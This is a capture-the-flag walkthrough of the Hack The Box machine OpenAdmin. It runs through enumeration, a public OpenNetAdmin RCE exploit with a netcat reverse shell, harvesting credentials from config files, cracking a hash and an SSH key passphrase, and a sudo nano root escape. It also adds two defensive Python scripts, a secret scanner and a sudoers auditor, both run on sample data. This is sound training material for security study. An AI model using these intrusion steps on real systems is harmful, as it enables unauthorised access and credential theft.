OpenAdmin from HackTheBox
OpenAdmin is rated Easy by Hack The Box, but user reports place it closer to Medium. It is a great challenge and part of TJNull's list of boxes for OSCP preparation. The box involves web enumeration but only minor web exploitation: the entry was simply a matter of finding the "in", then identifying the web app's name and version. The bulk of the work was enumeration on the system and knowing where to look for credentials and information. The real challenge was in the discovery of that information.
❯ sudo nmap -sV 10.10.10.171
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Initial enumeration with nmap shows that both port 22 and port 80 are open. SSH is rarely exploitable without credentials, so the web server on port 80 is the place to start.
Browsing the HTTP site shows only the default Apache installation page.
Running feroxbuster does return some interesting directories, each one serving its own website.
❯ feroxbuster -n -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.171/ -x html
The first target is /music/; clicking Login automatically signs you in as a guest.
The page immediately displays the version, and the page source identifies the web app as OpenNetAdmin.
Knowing both the application and the version, it is worth searching for exploits that are already public. That search turns up a known Remote Code Execution exploit for this version, which is used below:
To use the exploit, first set up a listener:
nc -lvnp 4444
Then run the exploit:
chmod +x ./OpenNetAdmin.sh
./OpenNetAdmin.sh $url $lhost $lport
This returns a reverse shell on the web server as www-data. The first thing to do is upgrade the shell to a proper TTY so that a stray Ctrl-C does not kill it:
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Press Ctrl-Z to background the shell, then run the following on your local terminal
stty raw -echo; fg
While poking around, the following search turns up a database_settings file in /opt/ona/www/local/config, which contains the first set of credentials:
find . -name '*settings*.php' 2>/dev/null
With credentials in hand, the next question is where to use them. First we collect usernames and then test the password against each one. The following lists the users with a /bin/bash shell:
grep '/bin/bash$' /etc/passwd
Trying the password with jimmy works: we are logged in as him!
Since SSH is also open, we can leave the netcat shell behind and log in as jimmy over SSH. Further poking around as jimmy does not uncover much, so the next move is to look at listening TCP and UDP ports.
This shows that port 52846 is listening on the loopback interface only. To see what it serves, we use SSH local port forwarding so we can reach it from our own machine:
ssh -L 1081:127.0.0.1:52846 jimmy@10.10.10.171
Now we can browse the content locally through the forwarded port.
Many attempts at common credentials went nowhere, so the credentials we need are most likely still somewhere on the web server.
We know this page is hosted on the loopback address and that it clearly has an index page, so its source must live somewhere on the web server. There is another directory called Internal inside /var/www.
Looking into it, the index.php code closely matches what we see on the localhost content, so this folder is likely the internally hosted site. Further down, index.php also contains an interesting value that appears to be a SHA-512 hash. SHA-512 is slow to brute force, so before starting John or hashcat it is worth checking online resources first. Crackstation is a great one: it uses very large rainbow tables of precomputed hash-to-password matches, so it is often worth searching there before anything else.
The good news is that Crackstation matched the hash within seconds (password blurred):
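Seen from the defensive side, the two findings above (database credentials sitting in a settings file and a SHA-512 hash hard-coded in index.php) are exactly what a secret scan over the web roots should catch. The Python script below is an added example, not code from the original writeup; it runs over constructed sample sources that imitate those files, and every path and value in it is made up.

```python
import re

# Constructed sample web-root sources imitating the files on this box (a DB settings
# file and a login page with a hard-coded digest); paths and values are made up.
SAMPLE_FILES = {
    "/opt/ona/www/local/config/database_settings.inc.php":
        "<?php\n"
        "$ona_contexts = array('DEFAULT' => array('databases' => array(array(\n"
        "  'db_type' => 'mysqli', 'db_host' => 'localhost',\n"
        "  'db_login' => 'ona_sys', 'db_passwd' => 'Example_DB_Pass1'))));\n",
    "/var/www/internal/index.php":
        "<?php\n"
        "if ($_POST['username'] == 'jimmy' &&\n"
        "    hash('sha512', $_POST['password']) == '" + "ab" * 64 + "') {\n"
        "    header('Location: /main.php');\n}\n",
    "/var/www/html/index.html": "<html><body>It works!</body></html>\n",
}

# Config keys that usually carry a secret, followed by =>, = or : and a quoted value.
CRED_RE = re.compile(
    r"""['"]?(?P<key>(?:db_)?pass(?:wd|word)?|secret|api_key|token)['"]?"""
    r"""\s*(?:=>|=|:)\s*['"](?P<val>[^'"]{4,})['"]""", re.IGNORECASE)
# Bare hex runs the length of a common digest (longest alternative first).
HASH_RE = re.compile(
    r"(?<![0-9a-f])(?:[0-9a-f]{128}|[0-9a-f]{64}|[0-9a-f]{40}|[0-9a-f]{32})(?![0-9a-f])",
    re.IGNORECASE)
DIGEST_NAMES = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}


def scan_source(files):
    """Return one finding per hit (path, line, kind, detail); secret values are never echoed."""
    findings = []
    for path, text in files.items():
        for lineno, line in enumerate(text.splitlines(), 1):
            for m in CRED_RE.finditer(line):
                findings.append({"path": path, "line": lineno, "kind": "credential",
                                 "detail": f"{m.group('key')} = <redacted>"})
            for m in HASH_RE.finditer(line):
                findings.append({"path": path, "line": lineno, "kind": "hash",
                                 "detail": f"{DIGEST_NAMES[len(m.group(0))]} literal in source"})
    return findings


if __name__ == "__main__":
    for f in scan_source(SAMPLE_FILES):
        print(f"{f['path']}:{f['line']}  {f['kind']}: {f['detail']}")
```

On a real host, build the dictionary from the files under the web roots (for example with pathlib) instead of SAMPLE_FILES; anything the scan reports should be moved out of the web tree or into a secrets store.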
Returning to the internal page and logging in as jimmy with this password gives the following page.
This is an RSA private key used with SSH. We can copy it into a file and try to log in with it. Copy everything from the first dash of the BEGIN line to the last dash of the END line and save it locally:
echo "content" > id_rsa
# SSH refuses a key that other users can read
chmod 600 id_rsa
Attempting to log in as any of the remaining users with this key prompts for a passphrase, so the key is encrypted with a passphrase we do not have. To get it, we can try to crack the key. First convert it into a hash John can work on:
# Convert the key into a hash
/usr/share/john/ssh2john id_rsa > crackme
Then use John or hashcat to crack it:
john crackme --wordlist=/usr/share/wordlists/rockyou.txt
After a few seconds the passphrase was recovered! With it we can try the key against the remaining users we know about.
Logging in as root was not possible, so joanna is the next bet.
# SSH login with the private key; enter the recovered passphrase when prompted
ssh -i id_rsa joanna@10.10.10.171
This was a success!
Logged in as joanna, we can read the first (user) flag.
Through general enumeration we find that joanna can run a single command with sudo without a password prompt.
Running that command opens a file in nano as root:
sudo /bin/nano /opt/priv
The first thing to do with a program like this is check whether it has an entry on https://gtfobins.github.io. GTFOBins shows how nano can be used to escape to a shell:
With that we are root and can read the root flag.
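The real weakness on this box is the sudo rule: a NOPASSWD entry that launches an interactive editor as root. As an added example (not part of the original writeup), the Python script below audits a constructed sudoers excerpt for NOPASSWD rules and flags the ones whose command is ALL or an editor or pager with a documented shell escape; the user names, hosts and paths in the sample are made up.

```python
import re
import shlex

# Constructed sudoers excerpt (not taken from the box); the last rule mirrors the
# OpenAdmin pattern of a passwordless sudo rule that launches an interactive editor.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/data /mnt/backup
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
"""

# Interactive editors and pagers documented on GTFOBins as able to spawn a shell;
# run as root through sudo, they hand the caller a root shell.
SHELL_ESCAPE_BINS = {"nano", "vi", "vim", "less", "more", "man"}

# user  host=(runas) [tags:] commands   (the common one-line sudoers rule shape)
RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<spec>.+)$")


def audit_sudoers(text):
    """Return one finding per NOPASSWD command; 'high' when it is ALL or a shell-escape binary."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and surrounding whitespace
        m = RULE_RE.match(line)
        if not m or "NOPASSWD:" not in m.group("spec"):
            continue
        for cmd in m.group("spec").split("NOPASSWD:", 1)[1].split(","):
            argv = shlex.split(cmd.strip())
            if not argv:
                continue
            binary = argv[0].rsplit("/", 1)[-1]
            risky = argv[0] == "ALL" or binary in SHELL_ESCAPE_BINS
            findings.append({"line": lineno, "user": m.group("who"), "runas": m.group("runas"),
                             "command": cmd.strip(), "severity": "high" if risky else "medium"})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {f['line']}: {f['user']} -> ({f['runas']}) {f['command']} [{f['severity']}]")
```

The fix on a real host is to require a password or, for an editor rule, to switch to sudoedit, which edits a temporary copy as the calling user instead of running the editor as root.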
The box is on TJNull's list of OSCP-like boxes, and it definitely lives up to that in terms of the information gathering required on target. Although Hack The Box rates it Easy, user reports put it nearer Medium. The exploits were great and not particularly difficult to discover; the information gathering was the key focus of this box.